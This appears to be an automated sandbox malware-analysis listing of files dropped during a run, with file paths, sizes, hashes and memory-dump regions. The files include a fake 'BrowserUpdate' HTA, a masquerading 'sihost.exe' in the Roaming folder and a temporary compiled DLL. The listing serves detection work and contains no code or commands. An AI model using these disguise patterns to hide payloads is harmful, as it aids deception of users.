0627322bdca4c4a3eeb846d8bf1282a199a5d1397f6f27a5a226ab76480e439938228d70f3211bbc2f67f7f7702ab8d392af96c6d8e717b94faee136d426936d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3495064f5a3997b56719f4445db3d0ba

SHA1
98c64ce00f6ec6bb229ac5c98c4bfa6de9eeee8b

SHA256
9f827b27ce8c90d16d5f4ca71d8149afffcae440161ae78139a7f87196270ac4

SHA512
9a77adf6c57d6a8d859d0e0271bbc6eef252fb249678a58ae80e0d561b219b92b3980c4bef903630868450c8b3e7edc9c4e6f8a607826fad432b1a21e4c916c0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
75f7bb5ecf7e6df6f6084c71a1976b8c

SHA1
05e04548a881a797a658af50aa176e93c1cc1fb1

SHA256
77bbc42504bac642156638bdb5cae37186730dc5c187e2bc748808e0f42ec6d5

SHA512
67770317dcd09d5c72c274ed6fa7dbd4f5a8209c5bdecd20775a9f57db3477ea51727c1e0fe545a1ead652c08a87fe94e110cb5b5d93122ccdb1447df611040c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\BrowserUpdate[1].hta

Filesize
12KB

MD5
acf4185c4306c40c2638122ea7464d4a

SHA1
fe5cbe2a9c3e83e4c1af9e312318a332c1ea2a88

SHA256
a42913382f1d2812268a7072d7272fc19441386b474813c1bff6930bd5984c1b

SHA512
7f46adfcb94ff24e594e482ca4eba6e768365d9dfc2555d40f3206f914f5a2897541817b408c29a0e1cda575111580cb32901fe501ba21add7c0906bfd016879

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\UvdlEoSKo[1].htm

Filesize
168B

MD5
d57e3a550060f85d44a175139ea23021

SHA1
2c5cb3428a322c9709a34d04dd86fe7628f8f0a6

SHA256
43edf068d34276e8ade4113d4d7207de19fc98a2ae1c07298e593edae2a8774c

SHA512
0364fe6a010fce7a3f4a6344c84468c64b20fd131f3160fc649db78f1075ba52d8a1c4496e50dbe27c357e01ee52e94cdcda8f7927cba28d5f2f45b9da690063

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab1AF3.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES41E1.tmp

Filesize
1KB

MD5
beb0ac1337d490ac305728e5a6841858

SHA1
e80bda77f5e6509b2f5bbda9d25808b70b14a43d

SHA256
5a5b5815952529b3ab5794e5918c852fe81464afae7c2bf6b911a38890e78511

SHA512
24148391b8be8d3c7c8845fa7d54254478c99f143ee957f6dc5eb9c8b0edff03f1f00fc5c043560bc6cb5061bf0605ce741d9bcc94d1cb2b3f30f9ce44b6bfac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1BD4.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ybrwpize.dll

Filesize
3KB

MD5
68ab8e0ea27fc982ffc336e92b49814a

SHA1
a4abca93af7849b739909d22a4d52fd624b4be36

SHA256
e840a2864aafb25a8ef7babb0e922c16526addbbd1de6243c17b941b87b11c41

SHA512
d09640cc67fb1d132660201bc9218110ddcf6f059256f9dd75be622c7dccdf4825a064c41b20bf22f2edf936a5f87344bebd5ccb2e5b8fc1cb8f8ff11b233290

Download Submit
C:\Users\Admin\AppData\Local\Temp\ybrwpize.pdb

Filesize
7KB

MD5
112e2c25eb4062f8841c24018f7a66a4

SHA1
9a9224dc6afedbddfe4be0231cc8cdb5729791b7

SHA256
b28966d69bf888a7854ac5a9dc77d98a9382423f8adac56640cbbaa1fcb8120d

SHA512
3d16b0f30b5cda0b1cfd88ca51d48111251c1025ae40ddc14811a16ce219e837f58ab67c4575297720845e65e348e3bd8f062d900129d51df2868e6be0214ff4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\B7PD42DY.txt

Filesize
70B

MD5
c42b231faaa2f2f8e56934f15bedd3ea

SHA1
a705bdb1bd108bbb8587f405710532195e049d55

SHA256
2efd6b7e3cbdff01994a8b048988c20d0a3a997069bfef67ce29ab4d70383cf6

SHA512
3a227198c4a839e1dfbaf3285614ab04ecc024cc0e3dff539aa5921e2826383b578608fc1fde67da82a7ce2c6de9bbada286d437a670eae6900e033048126eda

Download Submit
C:\Users\Admin\AppData\Roaming\sihost.exe

Filesize
6KB

MD5
b3b47b6ee61c3a64850d82d3debcf871

SHA1
3962069f0c5ef9781921009b493a1b9d82152a62

SHA256
4d3b36af0c5df29e21661945d4ada479187a119c35ceaba5c7d1cdd0ccb198c5

SHA512
3fd270aaeb87cfe1614ec954dd7f0168d41b5c78d3663a2aaa3abe8181d61b560c60c268e41edbea95b2704975e6abee86b29c7c553cc22a220f083d66691ed4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC41E0.tmp

Filesize
652B

MD5
e67e4120c93d0d1fb2fec5fb24faed4b

SHA1
4865646e23becd7cf97b044dc0edcd25bc2f3711

SHA256
896bd07a5f72a5704e681d041c86a2163f822d9e8d29406e4d75edf26c85b2fa

SHA512
811acd03ec78da280c0f5577b78f01d5022f67d741be6bf35dc55a1e2bf03ce1bd9ce4d1ba2ed97725e15bedea06c837081c6c6bbedb864f2118c0c65edaffdd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ybrwpize.0.cs

Filesize
456B

MD5
b482306a1ee20f92189f3cbcd699aba3

SHA1
42d499137c52fa5bed274ae4942b089dbf025119

SHA256
ca429dae59619b584c51f3eb7f070e425308c373ebe32222679ead6b9ca4f706

SHA512
47f9add1109662cd59843fed68a72edbbc13da41fd1757f8fbd5ea46aa70eb43b87865d903505a50b1b2419b41eb40878cce4eeb9ce6c2587a4e028e93e527c5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ybrwpize.cmdline

Filesize
309B

MD5
57b49b5843b420ddcb83485227c07022

SHA1
c5d3e810914e46b178e13876fc45bd3e0f0a9211

SHA256
02e60d3f0cc325ac6cd78fd2d516c157bdad6b33719c24ed2e649473636611e7

SHA512
26dad7f0939e2605744de4a9f1af41506fcd4786f15e04bab4fea11488e7d8af9acb5c2dff2cf015f4754cc159dac8c7a9f889bb5c3cc45ee5e41c4e01d58969

Download Submit
memory/804-88-0x0000000002450000-0x0000000002452000-memory.dmp

Filesize
8KB

Download
memory/1876-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1876-89-0x0000000002D70000-0x0000000002D72000-memory.dmp

Filesize
8KB

Download
memory/1876-1-0x000000007232D000-0x0000000072338000-memory.dmp

Filesize
44KB

Download
memory/1876-157-0x000000007232D000-0x0000000072338000-memory.dmp

Filesize
44KB

Download
memory/1876-159-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1876-162-0x000000007232D000-0x0000000072338000-memory.dmp

Filesize
44KB

Download
memory/2880-156-0x0000000001230000-0x0000000001238000-memory.dmp

Filesize
32KB

Download